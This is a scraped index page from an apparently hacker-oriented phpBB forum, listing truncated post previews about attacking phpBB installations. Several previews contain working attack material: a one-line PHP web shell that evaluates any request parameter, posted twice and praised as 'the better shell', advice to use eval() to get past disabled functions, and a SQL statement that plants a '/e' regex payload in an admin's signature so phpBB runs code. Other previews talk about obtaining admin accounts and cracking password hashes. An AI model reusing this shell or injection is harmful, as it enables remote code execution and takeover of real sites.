 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 175
 Members: 0
 Total: 175
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
|
Hi there,
I am able to insert this command using the administration panel of the forum. There is also a backup feature but its not working so i need to try this manually.
I managed to get sql ... |
|
|
|
|
learn php and use the better shell never made:
<?PHP
eval(stripslashes($_REQUEST[var]));
?>
..and this is cool shell,ya?Stop sending everybody to learn php.
... |
|
|
|
|
Without quotes?
Well, what about eval(stripslashes($_GET
eval($_REQUESTpage.php?var=eval(stripslashes($_REQUEST |
|
|
|
|
Oh yeaH! what a black hat TooL!
HAHAHAHAHAHAHAHAHAHAHHAHAHAH You really don't know what are you saying uahauhauahuahauahua |
|
|
|
|
learn php and use the better shell never made:
<?PHP
eval(stripslashes($_REQUEST[var]));
?>
|
|
|
|
|
see phpinfo(). 99% passthru is in disabled functions.
A good choice is to put an eval() instead of exec() and other. |
|
|
|
|
| PhpBB hashing algorithm is flexible and can be in some degree different from installation to installation, but main feature is using of THOUSANDS md5 hashing rounds for just one hash. It's comparable ... |
|
|
|
|
| uahauhauahuauh @rktfan maybe this thread is interesting for you xD |
|
|
|
|
Create file test.sql on your PC and put inside this code
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2;
Login in admin pan ... |
|
|
|
|
| Study php language. Then study phpbb3. After maybe you'll find a quite good way to get admin account (there are some low-risk vulnerability) |
|
|
| Page 1 of 1 |
All times are GMT |
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
